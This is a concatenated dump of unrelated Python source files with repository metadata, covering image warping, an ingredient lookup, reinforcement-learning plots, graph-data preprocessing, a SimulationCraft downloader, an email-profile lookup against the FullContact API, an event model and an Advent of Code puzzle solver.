rows, cols, ch = img.shape  # image dimensions (not used further)
quad_src = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]])
quad_dst = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]])
transform = cv2.getPerspectiveTransform(quad_src, quad_dst)
warped = cv2.warpPerspective(img, transform, (300, 300))
# Show the original and the warped result side by side.
plt.subplot(121)
plt.imshow(img)
plt.title('Input')
plt.subplot(122)
plt.imshow(warped)
plt.title('Output')
plt.show()
| 22.05 | 56 | 0.69161 |
4ff3b6b59836604f755980cd03adae455ffef034
| 10,665 |
py
|
Python
|
ingrediens.py
|
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
|
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
|
[
"MIT"
] | null | null | null |
ingrediens.py
|
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
|
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
|
[
"MIT"
] | 16 |
2020-01-28T23:04:13.000Z
|
2022-03-12T00:02:40.000Z
|
ingrediens.py
|
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
|
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
|
[
"MIT"
] | null | null | null |
import json
import pandas as pd
class Ingredients():
    """A searchable list of food ingredients.

    An ingredient is a plain list:
    ``[id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]``

    ``update()`` builds a lookup dictionary mapping normalized search terms
    (E-number variants, ingredient names, keywords) to the ingredient id, and
    ``contains()`` resolves a search string against it.

    Instances can be built manually from a list of items, via ``instance()``
    from a JSON file, or the static ``convert()`` can turn a suitably shaped
    Excel sheet into such a JSON file (sheet 1, header row: ID, E-Nr,
    ingrediens (comma separated), remark, annotation, classification,
    keywords (comma separated)).
    """

    def __init__(self, items=None, usePatch=True):
        """Create an ingredient collection.

        :param items: Optional list of ingredient items to start with.
        :param usePatch: If True, umlauts in search words are normalized to
            their base letters (e.g. ö -> o) before lookup.
        """
        try:
            self.usePatch = usePatch
            # Bug fix: the original used a mutable default (items=[]) which is
            # shared across all instances created without an argument.
            self.items = [] if items is None else items
            self.search_items = {}
        except Exception:
            print('Error in method {0} in module {1}'.format('init', 'ingrediens.py'))

    @staticmethod
    def instance(json_path, usePatch=True):
        """Build an Ingredients instance from the JSON file at *json_path*.

        :param json_path: Path to the JSON database file.
        :param usePatch: If True, umlauts in search words are normalized.
        :return: A ready-to-use Ingredients instance, or None on error.
        """
        try:
            with open(json_path, mode='r', encoding='utf-8') as json_file:
                json_data = json.load(json_file)
            ingrediens = Ingredients(json_data['items'], usePatch)
            ingrediens.update()
            return ingrediens
        except Exception:
            print('Error in method {0} in module {1}'.format('instance', 'ingrediens.py'))
            return None

    @staticmethod
    def convert(excel_path, json_path):
        """Convert the Excel sheet at *excel_path* into a JSON database.

        :param excel_path: Path of the source Excel file.
        :param json_path: Path of the JSON file to write.
        """
        try:
            raw = pd.read_excel(excel_path)
            ingrediens_data = Ingredients()
            for row in raw.values:
                ident = row[0]
                e_number = str(row[1]).strip()
                ingrediens_list = [part.strip() for part in str(row[2]).split(',')]
                remark = str(row[3])
                annotation = str(row[4])
                classification = str(row[5])
                keywords_list = [part.strip() for part in str(row[6]).split(',')]
                ingrediens_data.add([ident, e_number, ingrediens_list, remark,
                                     annotation, classification, keywords_list])
            ingrediens_data.update()
            with open(json_path, mode='w', encoding='utf-8') as json_file:
                json.dump(ingrediens_data.__dict__, json_file, ensure_ascii=False)
        except Exception:
            print('Error in method {0} in module {1}'.format('convert', 'ingrediens.py'))

    def __iter__(self):
        """Return an iterator over the ingredient items.

        Bug fix: the original returned ``self`` without defining ``__next__``,
        so iteration raised TypeError.
        """
        try:
            return iter(self.items)
        except Exception:
            print('Error in method {0} in module {1}'.format('iter', 'ingrediens.py'))
            return None

    def next(self):
        """Yield the ingredient items one by one (generator, kept for
        backward compatibility with the original API)."""
        try:
            for item in self.items:
                yield item
        except Exception:
            print('Error in method {0} in module {1}'.format('next', 'ingrediens.py'))
            return

    def add(self, item):
        """Append a new ingredient item to the collection.

        :param item: ``[id, e_number, ingrediens_list, remark, annotation,
            classification, keywords_list]``
        """
        try:
            self.items.append(item)
        except Exception:
            print('Error in method {0} in module {1}'.format('add', 'ingrediens.py'))

    def contains(self, item):
        """Resolve a search string against the search dictionary.

        The string is lower-cased, blanks are removed and (with usePatch)
        umlauts are normalized before the lookup.

        :param item: The search string.
        :return: ``(True, id)`` when found, ``(False, -1)`` otherwise,
            or None on error.
        """
        try:
            item = str(item).lower().replace(' ', '')
            if self.usePatch:
                item = self.replaceChar(item)
            if item in self.search_items:
                return True, self.search_items[item]
            return False, -1
        except Exception:
            print('Error in method {0} in module {1}'.format('contains', 'ingrediens.py'))
            return None

    def replaceChar(self, item):
        """Return *item* with the umlauts ä/ö/ü replaced by a/o/u.

        Bug fix: ``str.replace`` returns a new string; the original discarded
        the results and returned the input unchanged.
        """
        try:
            return item.replace("ö", "o").replace("ä", "a").replace("ü", "u")
        except Exception:
            print('Error in method {0} in module {1}'.format('replaceChar', 'ingrediens.py'))
            return None

    def replaceChar_in_String(self, item):
        """Return True when *item* contains one of the umlauts ä, ö, ü.

        Bug fix: the original tested ``if item.find(x):`` which is truthy for
        -1 (not found) and falsy for a match at position 0.
        """
        try:
            return any(umlaut in item for umlaut in ("ä", "ö", "ü"))
        except Exception:
            print('Error in method {0} in module {1}'.format('replaceChar_in_String', 'ingrediens.py'))
            return None

    def get_item(self, id):
        """Return the list of ingredient items whose id equals *id*.

        :param id: The ingredient id.
        :return: A (possibly empty) list of matching items, or None on error.
        """
        try:
            return [item for item in self.items if item[0] == id]
        except Exception:
            print('Error in method {0} in module {1}'.format('get_item', 'ingrediens.py'))
            return None

    def get_enumber(self, id):
        """Return the E-number of the ingredient with the given id."""
        try:
            return self.get_item(id)[0][1]
        except Exception:
            print('Error in method {0} in module {1}'.format('get_enumber', 'ingrediens.py'))
            return None

    def get_name(self, id):
        """Return the name list of the ingredient with the given id."""
        try:
            return self.get_item(id)[0][2]
        except Exception:
            print('Error in method {0} in module {1}'.format('get_name', 'ingrediens.py'))
            return None

    def get_remark(self, id):
        """Return the remark of the ingredient with the given id."""
        try:
            return self.get_item(id)[0][3]
        except Exception:
            print('Error in method {0} in module {1}'.format('get_remark', 'ingrediens.py'))
            return None

    def update(self):
        """Rebuild the search dictionary from the current items.

        Keys are: the E-number as 'e<nr>' and 'e-<nr>', every ingredient name
        and every keyword (lower-cased, blanks removed). For terms containing
        umlauts an additional de-umlauted variant is stored.

        Bug fixes vs. the original: the keyword loop stored the misspelled
        ``insert_srting`` variable but tested/inserted the *stale* value from
        the previous loop; a dead statement was removed.
        """
        try:
            for item in self.items:
                # E-numbers may carry attached letters (e.g. 'E 150a'); only a
                # leading 'e' is stripped, the rest is preserved.
                e_number = str(item[1]).lower().strip()
                e_number = (e_number[0].replace('e', '') + e_number[1:]).strip()
                self.search_items['e' + e_number] = item[0]
                self.search_items['e-' + e_number] = item[0]
                for term in item[2]:  # ingredient names
                    key = str(term).strip().lower().replace(' ', '')
                    self.search_items[key] = item[0]
                    if self.replaceChar_in_String(key):
                        self.search_items[self.replaceChar(key)] = item[0]
                for term in item[6]:  # keywords
                    key = str(term).strip().lower().replace(' ', '')
                    self.search_items[key] = item[0]
                    if self.replaceChar_in_String(key):
                        self.search_items[self.replaceChar(key)] = item[0]
        except Exception:
            print('Error in method {0} in module {1}'.format('update', 'ingrediens.py'))
| 39.065934 | 119 | 0.568776 |
8b03c4ca86da0b9cb69890510188b9bcc8bd9dc3
| 3,161 |
py
|
Python
|
shinrl/envs/mountaincar/plot.py
|
omron-sinicx/ShinRL
|
09f4ae274a33d1fc1d9d542f816aef40014af6b5
|
[
"MIT"
] | 34 |
2021-12-09T07:12:57.000Z
|
2022-03-11T08:17:20.000Z
|
shinrl/envs/mountaincar/plot.py
|
omron-sinicx/ShinRL
|
09f4ae274a33d1fc1d9d542f816aef40014af6b5
|
[
"MIT"
] | null | null | null |
shinrl/envs/mountaincar/plot.py
|
omron-sinicx/ShinRL
|
09f4ae274a33d1fc1d9d542f816aef40014af6b5
|
[
"MIT"
] | 4 |
2021-12-11T07:48:01.000Z
|
2022-03-01T23:50:33.000Z
|
import functools
from typing import Any, Optional
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from chex import Array
from matplotlib.axes import Axes
from .calc import *
from .config import MountainCarConfig
@jax.jit
def disc_pos_vel(
    config: MountainCarConfig, pos: float, vel: float
) -> Tuple[float, float]:
    """Discretize a continuous (position, velocity) pair onto the config grid.

    Returns (pos_idx, vel_idx) as uint32 indices clipped to the valid range.
    The small 1e-5 offset guards against float round-off just below a bin edge.
    """
    pos_step = (config.pos_max - config.pos_min) / (config.pos_res - 1)
    # Bug fix: the velocity bin width must use vel_res; the original divided
    # by pos_res (copy-paste), which skews indices whenever the resolutions
    # differ.
    vel_step = (config.vel_max - config.vel_min) / (config.vel_res - 1)
    pos_idx = jnp.floor((pos - config.pos_min) / pos_step + 1e-5).astype(jnp.uint32)
    pos_idx = jnp.clip(pos_idx, 0, config.pos_res - 1)
    vel_idx = jnp.floor((vel - config.vel_min) / vel_step + 1e-5).astype(jnp.uint32)
    vel_idx = jnp.clip(vel_idx, 0, config.vel_res - 1)
    return pos_idx, vel_idx
@functools.partial(jax.vmap, in_axes=(None, 1, 1), out_axes=0)
def undisc_pos_vel(
    config: MountainCarConfig, pos_round: float, pos_vel: float
) -> Tuple[float, float]:
    """Map discrete grid indices back to continuous (position, velocity).

    Vectorized over axis 1 of ``pos_round`` and ``pos_vel``; results are
    clipped to the configured continuous ranges.
    """
    pos_step = (config.pos_max - config.pos_min) / (config.pos_res - 1)
    # Bug fix: velocity spacing must use vel_res, not pos_res (mirrors the
    # same copy-paste bug in disc_pos_vel).
    vel_step = (config.vel_max - config.vel_min) / (config.vel_res - 1)
    pos = pos_round * pos_step + config.pos_min
    pos = jnp.clip(pos, config.pos_min, config.pos_max)
    vel = pos_vel * vel_step + config.vel_min
    vel = jnp.clip(vel, config.vel_min, config.vel_max)
    return pos, vel
@functools.partial(jax.vmap, in_axes=(None, 1), out_axes=0)
def disc(config, s):
    """Vectorized helper: raw state ids -> discrete (pos, vel) grid indices."""
    return disc_pos_vel(config, *state_to_pos_vel(config, s))
def plot_S(
    tb: Array,
    config: MountainCarConfig,
    title: Optional[str] = None,
    ax: Optional[Axes] = None,
    cbar_ax: Optional[Axes] = None,
    vmin: Optional[float] = None,
    vmax: Optional[float] = None,
    fontsize: Optional[int] = 10,
    **kwargs: Any,
) -> None:
    """Render a per-state table ``tb`` as a position x velocity heatmap.

    When no axes are supplied, a new figure with a heatmap axis and a narrow
    colorbar axis is created. Extra keyword arguments are forwarded to
    ``sns.heatmap``.
    """
    assert len(tb.shape) == 1
    # Scatter the 1-D state values into a (pos_res, vel_res) grid; cells with
    # no corresponding state stay NaN and are forward-filled below.
    reshaped_values = np.empty((config.pos_res, config.vel_res))
    reshaped_values[:] = np.nan
    ss = jnp.arange(tb.shape[0])[:, None]
    pos, vel = disc(config, ss)
    reshaped_values[pos, vel] = tb
    if ax is None:
        grid_kws = {"width_ratios": (0.95, 0.05)}
        fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(8, 6), gridspec_kw=grid_kws)
        ax, cbar_ax = axes[0], axes[1]
    vmin = tb.min() if vmin is None else vmin
    vmax = tb.max() if vmax is None else vmax
    # Axis tick labels: continuous values for each grid index.
    pos_ticks, vel_ticks = [], []  # kept from original; overwritten just below
    # NOTE(review): arange(pos_res) is used for *both* axes here, which only
    # labels the velocity axis correctly when pos_res == vel_res — confirm.
    ii = jnp.arange(config.pos_res)[:, None]
    pos_ticks, vel_ticks = undisc_pos_vel(config, ii, ii)
    pos_ticks = pos_ticks.reshape(-1).tolist()
    pos_ticks = [round(pos, 3) for pos in pos_ticks]
    vel_ticks = vel_ticks.reshape(-1).tolist()
    vel_ticks = [round(vel, 3) for vel in vel_ticks]
    # Transpose so velocity runs along the y-axis; forward-fill NaN holes.
    data = pd.DataFrame(reshaped_values, index=pos_ticks, columns=vel_ticks).T
    data = data.ffill(axis=0)
    data = data.ffill(axis=1)
    sns.heatmap(
        data,
        ax=ax,
        cbar=cbar_ax is not None,
        cbar_ax=cbar_ax,
        vmin=vmin,
        vmax=vmax,
        **kwargs,
    )
    ax.set_title(title, fontsize=fontsize)
    ax.set_xlabel("Position", fontsize=fontsize)
    ax.set_ylabel("Velocity", fontsize=fontsize)
50655ba275e3ff99311dff03da229bfb4792bf29
| 4,357 |
py
|
Python
|
official/gnn/bgcf/preprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/gnn/bgcf/preprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/gnn/bgcf/preprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
preprocess.
"""
import os
import argparse
import numpy as np
from mindspore import Tensor
from mindspore.common import dtype as mstype
from src.utils import convert_item_id
from src.dataset import TestGraphDataset, load_graph
# Command-line configuration for the preprocessing step.
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", type=str, default="Beauty", help="choose which dataset")
parser.add_argument("--datapath", type=str, default="./scripts/data_mr", help="minddata path")
parser.add_argument("--num_neg", type=int, default=10, help="negative sampling rate ")
parser.add_argument("--raw_neighs", type=int, default=40, help="num of sampling neighbors in raw graph")
parser.add_argument("--gnew_neighs", type=int, default=20, help="num of sampling neighbors in sample graph")
parser.add_argument("--result_path", type=str, default="./preprocess_Result/", help="result path")
# Parsed once at import time; read by get_bin() below.
args = parser.parse_args()
def get_bin():
    """Export 50 rounds of sampled graph data as raw .bin files.

    For each round a ``data_<i>`` directory tree is created under
    ``args.result_path`` with one numbered subdirectory per tensor, and the
    tensors are dumped with ``ndarray.tofile``.
    """
    train_graph, _, sampled_graph_list = load_graph(args.datapath)
    test_graph_dataset = TestGraphDataset(train_graph, sampled_graph_list, num_samples=args.raw_neighs,
                                          num_bgcn_neigh=args.gnew_neighs,
                                          num_neg=args.num_neg)
    num_user = train_graph.graph_info()["node_num"][0]
    num_item = train_graph.graph_info()["node_num"][1]
    for i in range(50):
        # One output directory tree per sampling round.
        data_path = os.path.join(args.result_path, "data_" + str(i))
        users_path = os.path.join(data_path, "00_users")
        os.makedirs(users_path)
        items_path = os.path.join(data_path, "01_items")
        os.makedirs(items_path)
        neg_items_path = os.path.join(data_path, "02_neg_items")
        os.makedirs(neg_items_path)
        u_test_neighs_path = os.path.join(data_path, "03_u_test_neighs")
        os.makedirs(u_test_neighs_path)
        u_test_gnew_neighs_path = os.path.join(data_path, "04_u_test_gnew_neighs")
        os.makedirs(u_test_gnew_neighs_path)
        i_test_neighs_path = os.path.join(data_path, "05_i_test_neighs")
        os.makedirs(i_test_neighs_path)
        i_test_gnew_neighs_path = os.path.join(data_path, "06_i_test_gnew_neighs")
        os.makedirs(i_test_gnew_neighs_path)
        # Draw a fresh sampled graph for this round, then fetch neighbors.
        test_graph_dataset.random_select_sampled_graph()
        u_test_neighs, u_test_gnew_neighs = test_graph_dataset.get_user_sapmled_neighbor()
        i_test_neighs, i_test_gnew_neighs = test_graph_dataset.get_item_sampled_neighbor()
        # Item node ids are shifted by num_user before export (user/item
        # nodes share one id space in the graph).
        u_test_neighs = Tensor(convert_item_id(u_test_neighs, num_user), mstype.int32)
        u_test_gnew_neighs = Tensor(convert_item_id(u_test_gnew_neighs, num_user), mstype.int32)
        i_test_neighs = Tensor(i_test_neighs, mstype.int32)
        i_test_gnew_neighs = Tensor(i_test_gnew_neighs, mstype.int32)
        users = Tensor(np.arange(num_user).reshape(-1,), mstype.int32)
        items = Tensor(np.arange(num_item).reshape(-1,), mstype.int32)
        neg_items = Tensor(np.arange(num_item).reshape(-1, 1), mstype.int32)
        # Every tensor is written under the same file name in its own folder.
        file_name = 'amazon-beauty.bin'
        users.asnumpy().tofile(os.path.join(users_path, file_name))
        items.asnumpy().tofile(os.path.join(items_path, file_name))
        neg_items.asnumpy().tofile(os.path.join(neg_items_path, file_name))
        u_test_neighs.asnumpy().tofile(os.path.join(u_test_neighs_path, file_name))
        u_test_gnew_neighs.asnumpy().tofile(os.path.join(u_test_gnew_neighs_path, file_name))
        i_test_neighs.asnumpy().tofile(os.path.join(i_test_neighs_path, file_name))
        i_test_gnew_neighs.asnumpy().tofile(os.path.join(i_test_gnew_neighs_path, file_name))
    print("=" * 20, "export bin files finished.", "=" * 20)
if __name__ == "__main__":
get_bin()
| 47.879121 | 108 | 0.708286 |
ba1237c81e0c4241ddb6bd5686ed9d889e12f4ee
| 3,951 |
py
|
Python
|
internal/auto_download.py
|
Saeldur/sl-shadow-priest
|
a7b027506e52db8e7786ed9d67971adbba7389bd
|
[
"MIT"
] | null | null | null |
internal/auto_download.py
|
Saeldur/sl-shadow-priest
|
a7b027506e52db8e7786ed9d67971adbba7389bd
|
[
"MIT"
] | null | null | null |
internal/auto_download.py
|
Saeldur/sl-shadow-priest
|
a7b027506e52db8e7786ed9d67971adbba7389bd
|
[
"MIT"
] | null | null | null |
"""downloads the nightly simc"""
#!/usr/bin/env python
import glob
import os
import re
import subprocess
import time
from urllib.error import URLError
from urllib.request import urlopen, urlretrieve
def download_latest():
    """Check for, download and unpack the latest nightly SimulationCraft build.

    Returns the path of the unpacked simc directory, or None when the
    nightly download index could not be reached.
    """
    seven_zip_paths = ["7z.exe", "C:/Program Files/7-Zip/7z.exe"]
    seven_zip_executable = _find_7zip(seven_zip_paths)
    print("Starting auto download check of SimulationCraft.")

    # Application root path, and destination path
    rootpath = os.path.dirname(os.path.realpath(__file__))
    download_dir = os.path.join(rootpath, "..", "auto_download")
    if not os.path.exists(download_dir):
        os.makedirs(download_dir)

    base_path = "http://downloads.simulationcraft.org/nightly"

    # Get filename of latest build of simc (listing is sorted newest-first).
    try:
        html = urlopen(f"{base_path}/?C=M;O=D").read().decode("utf-8")
    except URLError:
        print("Could not access download directory on simulationcraft.org")
        # Bug fix: the original fell through with 'html' unbound, which
        # crashed with NameError on the next line.
        return None
    filename = list(
        filter(None, re.findall(r'.+nonetwork.+|<a href="(simc.+win64.+7z)">', html))
    )[0]
    # Bug fix: corrupted "(unknown)" placeholders restored to the actual
    # filename/filepath in the f-strings below.
    print(f"Latest simc: {filename}")

    # Download latest build of simc
    filepath = os.path.join(download_dir, filename)
    if not os.path.exists(filepath):
        url = f"{base_path}/{filename}"
        print(f"Retrieving simc from url '{url}' to '{filepath}'.")
        urlretrieve(url, filepath)
    else:
        print(f"Latest simc version already downloaded at {filepath}.")

    # Bug fix: a stray `return filepath.strip(".7z")` here made the whole
    # unpack phase below unreachable (and str.strip removes characters, not a
    # suffix). Removed so the archive is actually extracted.

    # Unpack downloaded build and set simc_path
    dir_name = filename[: filename.find(".7z")]
    simc_path = os.path.join(download_dir, dir_name, "simc.exe")
    if not os.path.exists(simc_path):
        # pylint: disable=broad-except
        try:
            cmd = f'{seven_zip_executable} x "{filepath}" -aoa -o"{download_dir}"'
            print(f"Running unpack command '{cmd}'")
            subprocess.call(cmd)
            time.sleep(1)
            # Nightly builds include their commit hash, we need to strip that out.
            commit = dir_name.rsplit("-")[-1]
            _rename_directory(f"{download_dir}/simc-*-win64/", commit)
        except Exception as error:
            print(f"Exception when unpacking: {error}")
        # keep the latest 7z to remember current version, but clean up any other ones
        _cleanup_older_files(download_dir, dir_name)
    else:
        print(f"Simc already exists at '{repr(simc_path)}'.")
    return os.path.join(download_dir, dir_name)
def _find_7zip(search_paths):
    """Return the first existing 7-Zip executable among *search_paths*.

    Prints a note for each candidate that does not exist and raises
    RuntimeError when none of them do.

    The original contained an unreachable ``break`` after ``return`` and a
    bare ``except: continue`` that silently swallowed every error; both are
    removed — ``os.path.exists`` does not raise for ordinary path strings.
    """
    for executable in search_paths:
        if os.path.exists(executable):
            return executable
        print(f"7Zip executable at '{executable}' does not exist.")
    raise RuntimeError(
        "Could not unpack the auto downloaded SimulationCraft executable."
        f"Install 7Zip at one of the following locations: {search_paths}."
    )
def _cleanup_older_files(download_dir, current_dir):
    """Delete old simc downloads, keeping the current directory and its .7z.

    Best effort: any filesystem error aborts the cleanup with a notice
    (the original used a bare ``except``; narrowed to OSError so genuine
    programming errors are no longer hidden).
    """
    try:
        for file in glob.glob(f"{download_dir}/simc*"):
            basename = os.path.basename(file)
            if basename != current_dir and basename != f"{current_dir}.7z":
                print(f"Removing old simc from '{basename}'.")
                os.remove(file)
    except OSError:
        print("Unable to automatically remove files, cleanup old files in auto_download/")
def _rename_directory(glob_path, commit):
    """Suffix every directory matching *glob_path* with the given commit hash."""
    matches = glob.glob(glob_path)
    for folder in matches:
        # glob ends in '/', so folder carries a trailing slash; drop it
        # before appending the commit suffix.
        renamed = f"{folder[:-1]}-{commit}"
        print(f"renaming {folder} -> {folder}-{commit}")
        os.rename(folder, renamed)
| 34.657895 | 90 | 0.630979 |
ad85fe9834a7307717abfda7761f72db44b57b62
| 1,876 |
py
|
Python
|
OSINT-SPY-master/modules/email_search.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
OSINT-SPY-master/modules/email_search.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
OSINT-SPY-master/modules/email_search.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from .config import *
import requests
import json
def fetch_email(email_id, json_output=False):
    """Query the FullContact person-enrichment API for an e-mail address.

    Prints the profile details to stdout, or the raw JSON response when
    *json_output* is True. Returns None in all cases.

    :param email_id: e-mail address to look up.
    :param json_output: dump the raw API response and stop.
    """
    # fullcontact_api_key is provided by `from .config import *` at module top.
    url = 'https://api.fullcontact.com/v3/person.enrich'
    headers = {"Authorization": f"Bearer {fullcontact_api_key}"}
    data = json.dumps({"email": email_id})
    response = requests.post(url, data=data, headers=headers)
    if json_output:
        print(response.json())
        return
    # Translate the API's error status codes into user-facing messages.
    if response.status_code == 401:
        print('Wrong fullcontact_api_key.')
        return
    if response.status_code == 403:
        print('Invalid authentication. Check API key')
        return
    if response.status_code == 404:
        print('Profile not found.')
        return
    print('General Details:')
    print(('-' * 20))
    # Top-level profile fields; missing keys are skipped silently.
    attributes = ['fullName', 'ageRange', 'gender', 'location', 'title',
                  'organization', 'twitter', 'linkedin', 'facebook', 'bio', 'avatar', 'website']
    response = response.json()
    for attribute in attributes:
        try:
            value = response[attribute]
            if value is not None:
                print(f'{attribute.capitalize()}:: {value}')
        except KeyError:
            pass
    print('\nMore details:')
    print(('-' * 20))
    # List-valued fields nested under response['details'].
    details = ['emails', 'phones', 'employment', 'education', 'interests']
    for attribute in details:
        try:
            value_list = response['details'][attribute]
            if value_list:
                print(f'{attribute.capitalize()}:: ')
                print(('-' * 20))
                for value in value_list:
                    if isinstance(value, str):
                        print(value, end=' ')
                    else:
                        # non-string entries look like dicts of field -> value
                        # here — TODO confirm against the API response shape.
                        for data in value:
                            print(f'{data.capitalize()}:: {value[data]}')
                        print()
                print()
        except KeyError:
            pass
a8e96a1419b40c5be96c2127eaee9943ccfe26c2
| 1,930 |
py
|
Python
|
src/onegov/event/models/mixins.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/mixins.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/mixins.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm.types import UTCDateTime
from sedate import to_timezone
from sqlalchemy import Column
from sqlalchemy import String
from sqlalchemy import Text
from sqlalchemy.dialects.postgresql import HSTORE
from sqlalchemy.ext.mutable import MutableDict
class OccurrenceMixin(object):
    """ Contains all attributes events and ocurrences share.

    The ``start`` and ``end`` date and times are stored in UTC - that is, they
    are stored internally without a timezone and are converted to UTC when
    getting or setting, see :class:`UTCDateTime`. Use the properties
    ``localized_start`` and ``localized_end`` to get the localized version of
    the date and times.
    """

    #: Title of the event
    title = Column(Text, nullable=False)

    #: A nice id for the url, readable by humans
    name = Column(Text)

    #: Description of the location of the event
    location = Column(Text, nullable=True)

    #: Tags/Categories of the event, stored as an HSTORE whose keys are the
    #: tags (the values are unused empty strings)
    _tags = Column(MutableDict.as_mutable(HSTORE), nullable=True, name='tags')

    @property
    def tags(self):
        """ Tags/Categories of the event. """
        return list(self._tags.keys()) if self._tags else []

    @tags.setter
    def tags(self, value):
        # Store each (stripped) tag as an HSTORE key with an empty value.
        self._tags = dict(((key.strip(), '') for key in value))

    #: Timezone of the event
    timezone = Column(String, nullable=False)

    #: Start date and time of the event (of the first event if recurring)
    start = Column(UTCDateTime, nullable=False)

    @property
    def localized_start(self):
        """ The localized version of the start date/time. """
        return to_timezone(self.start, self.timezone)

    #: End date and time of the event (of the first event if recurring)
    end = Column(UTCDateTime, nullable=False)

    @property
    def localized_end(self):
        """ The localized version of the end date/time. """
        return to_timezone(self.end, self.timezone)
| 31.129032 | 78 | 0.689637 |
d16e278d7bc64d38072b77f5142fbceaee36a5ef
| 3,075 |
py
|
Python
|
aoc2020/day_20/part_1.py
|
en0/aoc2020
|
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
|
[
"MIT"
] | null | null | null |
aoc2020/day_20/part_1.py
|
en0/aoc2020
|
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
|
[
"MIT"
] | null | null | null |
aoc2020/day_20/part_1.py
|
en0/aoc2020
|
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
|
[
"MIT"
] | null | null | null |
from aoc2020 import *
from aoc2020.utils import math_product
from itertools import chain
import numpy as np
def tborder(tile):
    """Top edge of a tile's grid, joined into a string."""
    return "".join(tile[1][0])
def bborder(tile):
    """Bottom edge of a tile's grid, joined into a string."""
    return "".join(tile[1][-1])
def lborder(tile):
    """Left edge (first column) of a tile's grid, joined into a string."""
    return "".join(tile[1][:, 0])
def rborder(tile):
    """Right edge (last column) of a tile's grid, joined into a string."""
    return "".join(tile[1][:, -1])
def orientations(tile):
    """Yield all 8 orientations of a tile: 4 rotations of each mirror image."""
    key, grid = tile
    for _mirror in range(2):
        for _turn in range(4):
            yield key, grid
            grid = np.rot90(grid)
        grid = np.fliplr(grid)
class Solution(SolutionABC):
    """AoC 2020 day 20 part 1: product of the four corner tile ids."""

    # Known answer for the sample input, checked by the framework.
    expected = 20899048083289

    def solve(self) -> any:
        """Assemble the tile grid and multiply the ids of its four corners."""
        all_tiles = self.load_tiles()
        image_table = self.get_image_table(all_tiles)
        # Corners are every (x, y) combination of first/last row and column.
        return math_product([image_table[y][x][0] for x, y in [(0, 0), (0, -1), (-1, 0), (-1, -1)]])

    @classmethod
    def get_image_table(cls, tiles):
        """Arrange (id, matrix) tiles into a 2D grid by matching borders.

        ``orientations`` yields all 8 rotations/flips of a tile; the search
        first walks to the top-most piece, then to the left-most, then fills
        the left column downwards and finally completes each row rightwards.
        """
        # Find the top most piece.
        # Repeatedly hop to any other tile whose bottom border matches the
        # current tile's top border; stops when no such tile exists.
        search_tile = tiles[0]
        while search_tile is not None:
            t0, search_tile = search_tile, None
            for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
                if tborder(t0) == bborder(t):
                    search_tile = t
                    break
        search_tile = t0  # t0 holds the last successful match (top-most tile)
        # Find the left most piece.
        while search_tile is not None:
            t0, search_tile = search_tile, None
            for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
                if lborder(t0) == rborder(t):
                    search_tile = t
                    break
        search_tile = t0  # now the top-left corner tile
        assigned = set([search_tile[0]])  # ids of tiles already placed
        # Find all the left most pieces.
        # Walk downwards from the corner; each match starts a new row.
        img = [[search_tile]]
        while search_tile is not None:
            t0, search_tile = search_tile, None
            for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
                if bborder(t0) == tborder(t):
                    search_tile = t
                    img.append([t])
                    assigned.add(t[0])
                    break
        # Find the rest of each row
        for row in img:
            search_tile = row[0]
            while search_tile is not None:
                t0, search_tile = search_tile, None
                for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
                    if rborder(t0) == lborder(t):
                        search_tile = t
                        row.append(t)
                        assigned.add(t[0])
                        break
        #for r in img:
